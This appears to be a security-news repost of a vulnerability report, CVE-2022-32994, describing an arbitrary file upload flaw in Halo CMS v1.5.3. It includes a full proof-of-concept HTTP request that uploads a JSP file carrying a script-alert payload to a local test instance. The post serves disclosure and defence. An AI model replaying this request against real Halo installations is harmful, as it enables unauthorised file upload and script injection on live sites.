Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-32994: Halo cms v1.5.3 has an arbitrary format file upload vulnerability at /api/admin/attachments/upload · Issue #1 · zongdeiqianxing/cve-reports

Halo CMS v1.5.3 was discovered to contain an arbitrary file upload vulnerability via the component /api/admin/attachments/upload.

CVE
#vulnerability#web#windows#apple#js#git#java#auth#chrome#webkit

https://github.com/halo-dev/halo/

Halo cms v1.5.3 has an arbitrary format file upload vulnerability at /api/admin/attachments/upload. Attackers can upload files in formats such as jsp、html etc.

Proof of Concept

POST /api/admin/attachments/upload HTTP/1.1
Host: 127.0.0.1:8090
Content-Length: 219
Admin-Authorization: 244a0b5340d943ffb8be55bbf3c0db2f
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFxTUuVBMVJqfHQHX
Origin: http://127.0.0.1:8090
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8090/admin/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=node04b75v93fl79m6b5ujcpwcvp82.node0
Connection: close

------WebKitFormBoundaryFxTUuVBMVJqfHQHX
Content-Disposition: form-data; name="file"; filename="2.jsp"
Content-Type: application/octet-stream

1<script>alert(1)</script>
------WebKitFormBoundaryFxTUuVBMVJqfHQHX--

permalink: AttachmentServiceImpl.java L110
Security is not checked in the relevant code

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907